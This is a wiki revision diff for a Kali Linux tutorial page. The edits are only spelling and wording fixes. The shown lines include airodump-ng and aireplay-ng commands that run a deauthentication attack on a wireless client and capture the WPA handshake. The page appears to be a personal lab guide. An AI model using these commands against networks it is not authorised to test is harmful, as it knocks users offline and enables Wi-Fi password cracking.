Changes between Version 6 and Version 7 of Kali
- Timestamp:
- 07/07/2021 06:39:09 PM (3 years ago)
Legend:
- Unmodified
- Added
- Removed
- Modified
-
Kali
v6 v7 172 172 sudo airodump-ng -c44 --write my-handshake --bssid 11:22:33:44:55:66 wlan0mon 173 173 }}} 174 Run this scan until a client is identified. For this example I've used my cell phone MAC {{{77:88:99:AA:BB:CC}}}.174 Run this scan until a client (station) is identified. For this example I've used my cell phone MAC {{{77:88:99:AA:BB:CC}}}. 175 175 176 176 Start a new SSH session, so both sessions are open simultaneously. … … 180 180 sudo aireplay-ng --deauth 0 -a 11:22:33:44:55:66 -c 77:88:99:AA:BB:CC wlan0mon 181 181 }}} 182 Upon suc ess the client is disconnected from the access point. When the client reconnects airodump-ng will capture the handshake and log it to the designated file.182 Upon success the client is disconnected from the access point. When the client reconnects airodump-ng will capture the handshake and log it to the designated file. 183 183 184 184 [[Image(handshake.png,500px)]]